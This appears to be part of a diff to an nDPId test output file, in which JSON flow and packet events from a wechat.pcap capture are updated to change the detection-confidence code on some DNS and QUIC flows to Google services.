+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} +02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -34,22 +34,22 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1492167350333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167350333,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92D9AAEAR3brAqAFnwKgB\/rP+ADUAKS5MZgIBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1492167350372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1492167350372,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA1s\/4AyDQ0ZgKBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACiyoADQNuczEGZ29vZ2xlwBjAEAACAAEAAosqAAYDbnMywEHAEAACAAEAAosqAAYDbnM0wEHAEAACAAEAAosqAAYDbnMzwEHAPQABAAEABThHAATY7yAKwFYAAQABAAUudQAE2O8iCsB6AAEAAQAFLnUABNjvJArAaAABAAEABS51AATY7yYK"} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1492167350385,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167350385,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivyhAAEAR8DbAqAFnrNkXQ8kzAbsFThBpDTHWY7YNkySLUTAzNQEAZRP82mbzhTNOuyagAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb23DJ9pgKUoswhKlaAfLoi3sQZPhfUFgtpep51u0rkbBgx\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1492167350386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167350386,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCvylAAEAR9BXAqAFnrNkXQ8kzAbsBbud7DTHWY7YNkySLUTAzNQLvwr0xyGRZ7meDZlovLzVjAbbzC3jR2f2rSyaEQR29GdHUR3g0xdsFTdTip7X1Nnsf4tYU5MBGkSRYowzYqBAgeAEueiV49O5ngVqvp6AacuKzAzgJV3z622EcXJUEyhTJ+nOIANjFkaDTQTI+jdNEu4FfF\/TnyxM++AGJ3to5M6SWYBz2BeCP\/OGMSC7yUukPIe4sRQeIQcXq+IYSj3PAlHKxZT8HDRP7kjwgghqQy0grhbmgn+9HaZmoQLo9gu4ijkDWy6wUW+W8oMWbJ3Ky6wEFXzApvzV\/FZNjJh6PDtkHubM5JHhhh00iIakeLzopZrU7PnZst39suCb9JKpUYtFvmoJnG3+X2ld76667v+kx3ZpHcdgXPlvpm8rm+2k6Em\/vgF23i7kHM9aRW5K+1InNa4QsADwuokzDCUylLbXZYixDaZtGruoPUyaIkf6OjyLbS2SNBQ=="} 02244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1492167350462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167350462,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivzBAAEAR8C7AqAFnrNkXQ8kzAbsFTm8mDTHWY7YNkySLUTAzNQMCK\/NUmHquSjxA+X2gAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb23DJ9pgKUoswhKlaAfLoi3sQZPhfUFgtpep51u0rkbBgx\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1492167351026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167351026,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92FdAAEAR3aLAqAFnwKgB\/to2ADUAKSL33acBAAABAAAAAAAABGRvY3MGZ29vZ2xlA2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1492167351061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1492167351061,"pkt":"eJKcD6iO8IQvSpdgCABFoADVAABAAEARtMLAqAH+wKgBZwA12jYAwUoh3aeBgAABAAEABAAEBGRvY3MGZ29vZ2xlA2NvbQAAAQABwAwAAQABAAAA2QAE2DrGLsARAAIAAQACiyoABgNuczLAEcARAAIAAQACiyoABgNuczHAEcARAAIAAQACiyoABgNuczPAEcARAAIAAQACiyoABgNuczTAEcBPAAEAAQAFOEYABNjvIArAPQABAAEABS50AATY7yIKwGEAAQABAAUudAAE2O8kCsBzAAEAAQAFLnQABNjvJgo="} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 